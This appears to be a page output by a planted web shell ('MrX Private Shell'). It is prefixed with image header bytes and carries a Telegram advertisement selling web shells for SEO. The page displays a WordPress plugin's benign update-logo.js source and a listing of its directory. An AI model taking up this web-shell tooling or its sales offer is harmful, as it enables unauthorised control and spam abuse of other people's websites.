����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { UpdateLogoConfirm } from '@agent/workflows/theme/components/UpdateLogoConfirm';
import { __ } from '@wordpress/i18n';
const { abilities } = window.extAgentData;
export default {
available: () => abilities?.canEditSettings && abilities?.canUploadMedia,
id: 'update-logo',
whenFinished: {
component: UpdateLogoConfirm,
},
example: {
text: __('Change website logo', 'extendify-local'),
agentResponse: {
// translators: This message shows above a UI where the user can upload or replace their site logo.
reply: __(
'Below you can upload or replace your website logo.',
'extendify-local',
),
whenFinishedTool: {
id: 'update-logo',
labels: {
confirm: __('Updated the site logo', 'extendify-local'),
cancel: __('Canceled the site logo update', 'extendify-local'),
},
},
},
},
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| components | Folder | 0755 |
|
|
| tools | Folder | 0755 |
|
|
| add-post-to-menu.js | File | 528 B | 0644 |
|
| change-animation.js | File | 1.02 KB | 0644 |
|
| change-site-design.js | File | 1.99 KB | 0644 |
|
| change-site-vibes.js | File | 1.45 KB | 0644 |
|
| change-theme-fonts-variation.js | File | 1.38 KB | 0644 |
|
| change-theme-variation.js | File | 1.23 KB | 0644 |
|
| generate-color-palette.js | File | 297 B | 0644 |
|
| update-logo.js | File | 842 B | 0644 |
|
| update-site-icon.js | File | 893 B | 0644 |
|